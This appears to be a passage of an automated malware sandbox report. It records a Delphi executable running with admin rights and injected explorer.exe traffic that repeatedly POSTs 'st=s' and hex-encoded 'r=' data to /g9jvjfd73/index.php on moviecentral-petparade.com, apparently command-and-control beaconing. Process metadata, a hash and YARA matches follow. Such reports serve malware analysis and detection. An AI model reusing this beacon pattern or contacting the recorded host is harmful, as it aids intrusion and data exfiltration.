                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOo%2BGG3EGrN45DR1KaPztTl47Q3AaNbN%2FruRq3V2sDGSYQQhDaigCON3Ykjjo8ua1NhXZfYjgYWYTdMvfcjg5HwgX8MpDiV%2Ba78FQdRUZW7cYw2Df%2BGX85xTOzAaelpyWmuMzpZ8jGrAcZhJIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3fa6e7f8de956-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1487&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      28192.168.2.950010172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:43.629914999 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:26:44.584733009 CET776INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:44 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZFAM%2FbW6vUEGXC4ZfR1kc7iz1slNabwnqUlK9TaDkJhxrgxtXHuxylnwf3Hltie8Cx34NRT5sSwAo18eqJ%2BFduPBdRtrkiau98mGpWvVwZ4tiBvcPThCIDWMXgQGDv4Bb3oizUvJsFSkfjGbVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3fa7e0e68e781-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2108&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      29192.168.2.950011172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:46.112869024 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:26:46.990211964 CET794INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:46 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IYVi%2B1Img4nwHJtJwLeCUf1PXRr9Jw%2BZt3lZwN%2FqEtajobWVodzvYulUWA9mlmqFrs4a8MzP67MsqjGsVKBtZhqQkPIbW0tg3R8dhJSSOeyB%2Bqw7%2BPC9AyNctXRJw3%2B92hzQPTmy1TS%2B%2ByHKEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3fa8d8d9beb06-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1086&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      30192.168.2.950012172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:48.643749952 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:26:49.516539097 CET782INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:49 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BfrcozFnc8m7922vXh4rgW7uM%2B6LdUcFP92mfNKzumf21f%2FZLNh179QXSeBOFT%2B%2BNTThY7QDLBLLWMjD9Y8OhCU8SVFoeNotq0IF8wz%2FYfzJ8pKdglpd763jERQEZWxpIN2yHVc2DH2EokQ6GA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3fa9d4e0c2e79-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1661&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      31192.168.2.950013172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:51.039572954 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:26:51.934885025 CET779INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:51 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x1Iy9gFpdnk8%2BD%2F51QLfaNuPkW7xQVyVnILwSSaN9kS3DDiuH3zQJ9wgYs7kT64geiUP8VqW0Z0tIV4FweGvEziTF7DDcFn9osTD10K97kmD4L0tymMkG8EUIT9E%2F5EP7DuXOUHL6OfIJp2xvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3faac6cdf7d54-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1084&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>
                                                                                                                                                                                                                      Oct 31, 2024 14:26:51.934895992 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      32192.168.2.950014172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:53.567806005 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:26:54.439513922 CET785INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:54 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J2oa%2Fv%2Fy89BMhWmVjCbBOcnZVxg7rPqMU%2BN%2F8Jls8rJ%2F8vcgPt8p34ZlJt%2FIsy5BquVU1VhJzixWf6EgKt7GUnB%2B69Zlpkga2cbtMccSABziBJlerrTCZNxEGuxUPptWsgV608lmGvI%2F6x%2BNSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3fabc1c1ae7fb-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2185&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1
                                                                                                                                                                                                                      Oct 31, 2024 14:26:54.439558983 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      33192.168.2.950015172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:55.958731890 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:26:56.939987898 CET788INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:56 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9EfwyuieNpbcg76x%2BmAzp6%2Bz0V2NW9dVu1CiUxCyhIc%2BpOi2ATprAON76b27%2FA7h6BgvH%2BzttjGR5lO004vzH15JdBNo3TQR9ITTG17t8GeRxstx9y05BM6AkMKXPFNgbPLMcqKvVgrrmPGFmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3facb29613583-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1183&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      34192.168.2.950016172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:58.567997932 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:26:59.340718985 CET782INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:59 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xUNMniKe5yrBuIO%2Fpu%2BGyWhpkvFJ4CHctYEbQ87xIYxP9aScMlKgmvWYArE45%2FCN9AIjMAiW3VDgrJXjN9nFIKP56JmcFQXV9jvD34Uix868%2Fv7ztzHrSEbihEO%2B4lqd9Fr3pKdBWvtNjOecaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3fadb9966478a-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      35192.168.2.950017172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:27:00.849298000 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:27:01.600033045 CET790INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:27:01 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tA1R2zq0uRNBK%2B2xTlzGHLaRj26gnuB7s5oI%2F%2BQjd2QqoeNGSty2W0pEcLLLv7DTt8eijPPYjTNAH3LQQhFD7ReasarcKHBPJY%2BsFfwDKnyIq8ocae9qvW6I7EizWrrESE9C1EZVVVBPz%2B%2BWyg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3fae9af3c6c31-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1249&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      36192.168.2.950018172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:27:03.273612022 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:27:04.183170080 CET779INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:27:04 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YvrhtDg66CSqTgXOMB%2BUipw8wF9s3ZmqCud10J9sXqOZm%2FNwGGTF9EP%2BOb1%2F9y8NLhnVSJXWAc81Gr3jaRqF9qUcau5KDRYD1w5VKAFqt92Adb2FCHKsoXvXtLZqPA2zpPqGtTShDYjKLYUlSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3faf8ec256b07-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=933&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      37192.168.2.950019172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:27:05.694255114 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:27:06.558212042 CET784INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:27:06 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zFarOdzAD9lDL65eGR9VeaM4xU8LGXrsE7eBdKgRG041BpGQ2elxjj9CNO%2BuMkEKC1BxBdDnIro90UEM6MzD1GYRk%2FzCNuAfeUirqZDv3x5NO1pxpFkOSFVYrrCwKLlXk477g5kXuZdNlhq1%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3fb07f9dc2c9e-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2244&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                      Start time:09:25:00
                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe"
                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                      File size:13'599'640 bytes
                                                                                                                                                                                                                      MD5 hash:C52C721E095A91BB0D589DD0206D5F3D
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1348154278.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000002.1376105942.000000000568C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                      Start time:09:25:03
